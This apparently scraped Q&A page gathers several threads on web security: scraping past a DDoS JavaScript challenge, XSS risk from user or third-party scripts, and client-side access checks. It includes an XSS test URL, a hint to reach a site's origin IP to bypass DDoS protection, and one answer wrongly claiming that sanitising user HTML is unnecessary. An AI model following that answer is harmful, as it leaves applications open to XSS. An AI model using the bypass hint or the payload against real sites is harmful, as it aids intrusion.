I'm trying to scrap the data from the website using file_get_contents but instead of the webpage source I'm getting following code:
<body onload="challenge();">
<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 6(){2.3=\'4=5; 0-7=8; 9=/\';a.b.c()}',13,13,'tax|function|document|cookie|ddosdefend|1d4607e3ac67b865e6c7263260c34e888cae7c56|challenge|age|0|path|window|location|reload'.split('|'),0,{}))
Engine is wordpress. Is there any chance to get real source?
file_get_contents seems to work fine. However, it seems you are not served the desired content but some JavaScript code which needs to be evaluated before redirecting to the content.
This might be because the website you want to scrape uses a DDOS protection (e.g. something like CouldFlare) which detects your simple scraping attempt.
Usually, a DDOS protection service is a proxy between the original webserver and your scraper. It inspects your request behavior, user agent etc. and based on that serves you either the original webserver's content or presents you a challenge (e.g. captcha, or simply requires you to evaluate javascript etc.).
If you can get the IP address of the original webserver, you might be able to directly access it. The DNS resolution for the webserver's name will direct you to the proxy, so you have to look elsewhere. Alternatively, use a web scraping library that emulates real browser behavior in PHP.
Related
I have a website builder which allows users to drag and drop HTML blocks (img, div, etc...) into the page. They can save it. Once they save it, they can view the page.
I also allow custom code like JavaScript. Would it be safe to have their page be displayed on another server on a subdomain (mypage.example.com) but still fetched from the same database as the main server, or does it not matter to put it on the same server as the main server?
As far as I know, they cannot execute any PHP code since I will be using echo to display the page content.
Thanks for help!
That depends on your setup. If you allow them to run custom JavaScript, they can probably steal session tokens from other users, which could be used to steal other accounts. I would recommend reading about XSS (Cross-Site-Scripting).
In short: XSS is the vulnerability to inject code into a site, which will run on other peoples computers.
It wouldn't make sense to give you a strict tutorial on how to do this at this point, because every system is different and needs different configuration to be attack-resistant.
Letting users put code somewhere is always a risk!
there is no need for another server, but you do need another domain to prevent Cross Site Scripting attaks on your main page. and no, a subdomain may not be sufficient, put it on another domain altogether to be on the safe side. (luckily domains can be acquired for free if you're ok with a .tk domain)
Would it be safe to have their page be displayed on another server on a subdomain
even a subdomain could be dangerous, just put it on another domain altogether, and you'll be safe.
or does it not matter to put it on the same server as the main server?
you can have it on the same server. btw, did you know that with shared webhosting services (like GoDaddy, hostgator, etc) there's thousands of websites sharing a single physical server?
also, DO NOT listen to the people saying you need to sanitize or filter the HTML, that is NOT true. there is no need to filter out anything, in my opinion, that is corruption of data. don't do that to your users, there's no need to do it. (at least i can't think of any)
As far as I know, they cannot execute any PHP code since I will be using echo to display the page content.
correct. if you were doing include("file"); or eval($code); then they could execute server-sided code, but as long as you're just doing echo $code;, they won't be able to execute server-side code, that's not a security issue.
We're talking to a 3rd party to include some of their data on a website of ours, they want to do it either through an iframe which I don't prefer because of responsiveness reasons.
The other options they offer is the inclusion of a javscript file which will take a parameter to know what DOM element to put the results in.
Basically this gives them access to the javascript scope of our website in which if they wanted can do stuff like hide dom objects etc.
My question is, are there any security things I have to think off? Can they in their javascript for example write malacious code that in the end reads .php files from our server and get passwords from config files etc? Or is the only thing they can do DOM related?
They could:
Take control of users' cookies, including reading and modifying
them.
Redirect the user to any site they would like.
Embed any code they would like into the page.
They can't:
Access php files directly.
Access any server files directly.
Javascript runs in the browser and not on the server.
You're essentially giving them trusted XSS privileges.
If you can do something in a web browser (make posts, "browse" a page, etc), you can automate it using JavaScript. They won't be able to upload/modify your PHP files unless you (or your users) can.
To the user, you're giving them to capability to impersonate you.
To you, you're giving them the capability to impersonate users.
Can they in their javascript for example write malacious code that in the end reads .php files from our server and get passwords from config files etc?
They can do anything in the JavaScript code you're including on your page for them that you can do in JavaScript code on that page. So that could be just about anything you can do client-side. It includes (for instance) grabbing session information that's exposed to your page and being able to send that information elsewhere.
If you don't trust them not to do that, don't include their JavaScript in your page.
We're talking to a 3rd party to include some of their data on a website of ours
Have them make that information available as data, not code, you request via ajax, and have them enable Cross-Origin Resource Sharing for the URL in question for requests from your origin. Then, you know you're just getting their data, not letting them run code.
Note that using JSONP instead of CORS will enable them to run code again, so it would have to be true ajax with CORS if you don't trust them.
You shouldn't have to worry about PHP files, or config files but stealing session cookies or other XSS-style attacks could definitely be an issue.
Why can't/won't they provide data in the form of an API?
I want some content of my website to be dynamically loaded after login. A $.post(...) interacts with a servlet which validates the user's credentials, and then a $.load(url) loads the content from a separate page into a <div>. I noticed that, as long as I know where to fetch the content from, I can force this behavior from the chrome javascript console, bypassing validation.
How can I prevent a user from doing this?
You can't.
Once a document has been delivered to the user's browser it is completely under the control of the user. They can run any JS they like.
The URLs you present on your webserver are the public interface to it. Anyone can request them. You can use authentication/authorization to limit who gets a response, but you can't make that response conditional on the user running specific JavaScript that you supply.
The server needs to authorize the user each time it delivers restricted data. You can't do it once and then trust the browser to enforce it.
You can add a secret parameter to the url you load. By defining a random variable in the users session (server side) or in the database, and then return this variable once the validation is successful so your javascript code can use the variable in the next load call. In the load url you can check at the server side if the secret parameter had the correct value or not.
Hope its clear.
The simple answer is: You Can't.
JavaScript runs within the browser and therefore a user or application can run their own code whenever the feel like. This could be as simple as adding new CSS or running their own JS codes.
The main thing you can do to disable this is to ensure all of the requests are validated on your server side before being run as well as allowing only entry for certain types of information (like only allowing integers as numbers to stop strings coming through).
Something close to this sort of problem is XSS or Cross-Site Scripting. A 3rd party will try to inject some malicious code to a trusted website, usually some form of POST, to affect different users. Here is some more information on the matter
Cross-Site Scripting - Wikipedia
CSS - OWASP
I'm looking for a method to scrape a website from server side (which uses javascript) and save the output after analyzing data into a mysql database. I need to navigate from page to page by clicking links and submitting data from the database,without session expiring . Is this possible using phpquery web browser plugin? . I've started doing this using casperjs. I would like to know the pros and cons of both methods. I'm a beginner in the coding space. Please help.
I would recommend that you use PhantomJS or CasperJS and parse the DOM with JavaScript selectors to get the parts of the pages you want back. Don't use phpQuery as it's based on PHP and would require a separate step in your processing versus using just JavaScript DOM parsing. Also, you won't be able to perform click events using PHP. Anything client side would need to be run in PhantomJS or CasperJS.
It might even be possible to write a full scraping engine using just PHP if that's your server side language of choice. You would need to reverse engineer the login process and maintain a cookie jar with your cURL requests to keep your login valid with each request. Once you've established a session with the the website, you can then setup your navigation path with an array of links that you would like to crawl. The idea behind web crawling is that you load a page from some link and process the page and then move to the next link. You continue this process until all pages have been processed and then your crawl is complete.
I would check out Google's guide Making AJAX Applications Crawlable the website you're trying to scrap might have adopted the scheme (making their site's content crawlable).
You want to look for #! in the URL's hash fragment, this indicates to the crawler that the site supports the AJAX crawling scheme.
To put it simply, when you come across a URL like this.
www.example.com/ajax.html#!key=value you would modify it to www.example.com/ajax.html?_escaped_fragment_=key=value. The server should respond with a HTML snapshot of that page.
Here is the Full Specification
I understand there are lots of questions concerning Cross-Site Scripting on the SO and tried to read the most voted ones. Having read some webpages too I'm still unsure about all possibilities that this attack type can use. I don't ask how to sanitianize input, rather what one can expect.
In most examples given on SO and other pages there are two methods, where the simplest (eg. this one on PHPMaster) seams to be inserting some <script> code used for stealing cookies etc.
The other presented here by user Baba is to insert full <form> code structure, however it seems it should not work until user submits a form, however some JavaScript event like ... onmouseover='form.submit()'... might be used.
All network examples I've been able to check are only methods based on using some JavaScript code.
Is it possible to use other methods, say -- somehow -- changing the HTML, or even the server-side script?
I know one can obtaining this by SQL injection or just hacking on the server, but I mean only by manipulating (wrong handled) GET, POST requests -- or perhaps some other?
Cross-Site Scripting is not just about inserting JavaScript code into a web page. It is rather a general term for any injection of code that gets interpreted by the browser in the context of the vulnerable web page, see CWE-79:
During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.
An attacker could, for example, inject his own login form into an existing login page that redirects the credentials to his site. This would also be called XSS.
However, it is often easier and more promising to inject JavaScript as it can do both control the document and the victims browser. With JavaScript an attacker can read cookies and thus steal a victim’s session cookie to hijack the victim’s session. In certain cases, an attacker would even be able to execute arbitrary commands on the victim’s machine.
The attack vector for XSS are diverse but they all have in common that they are possible due to some improperly handled input. This can be either by parameters provided via GET or POST but also by any other information contained in the HTTP request, e.g. cookies or any other HTTP header fields. Some use a single injection point, others are split up to multiple injection points; some are direct, some are indirect; some are triggered automatically, some require certain events; etc.
I know one can obtaining this by SQL injection or just hacking on the server, but I mean only by manipulating (wrong handled) GET, POST requests -- or perhaps some other?
GET parameters and POST bodies are the primary vector for attacking a web application via HTTP requests, but there are others. If you aren't careful about file uploads, then I might be able to upload a Trojan. If you naively host uploaded files in the same domain as your website, then I can upload JS or HTML and have it run with same-origin privileges. Request headers are also inputs that an attacker might manipulate, but I don't know of successful attacks that abuse them.
Code-injection is a class of attacks that includes XSS, SQL Injection, Shell injection, etc.
Any time a GET or POST parameter that is controlled by an attacker is turned into code or a programming language symbol, you risk a code-injection vulnerability.
If a GET or POST parameter is naively interpolated into a string of SQL, then you risk SQL injection.
If a GET or POST parameter (or header like the filename in a file upload) is passed to a shell, then you risk shell injection and file inclusion.
If your application uses your server-side language's equivalent of eval with an untrusted parameter, then you risk server-side script injection.
You need to be suspicious of all your inputs, treat them as plain text strings, and when composing a string in another language, convert the plain text string into a substring in that target language by escaping. Filtering can provide defense in depth here.
XSS - is it only possible by using JavaScript?
No. VBScript can be injected in IE. Javascript can be injected indirectly via URLs and via CSS. Injected images can leak secrets hidden in the referrer URL. Injected meta tags or iframes can redirect to a phishing version of your site.
Systems that are vulnerable to HTTP response header splitting can be subverted by HTML & scripts injected into response headers like redirect URLs or Set-Cookie directives.
HTML embeds so many languages that you need to be very careful about including snippets of HTML from untrusted sources. Use a white-listing sanitizer if you must include foreign HTML in your site.
XSS is about javascript.
However to inject your malicious javascript code you have to use a vulnerability of the pages code which might be on the server or client side.
You can use CSP (content security policy) to prevent XSS in modern browses.
There is also a list of XSS tricks in the XSS Cheat Sheet. However most of those tricks won't work for modern browsers.
Webkit won't execute javascript if it is also part of the request.
For example demo.php?x=<script>alert("xss")</script> won't display an alert box even if it the script tag gets injected into the dom. Instead the following error is thrown:
"Refused to execute a JavaScript script. Source code of script found within request."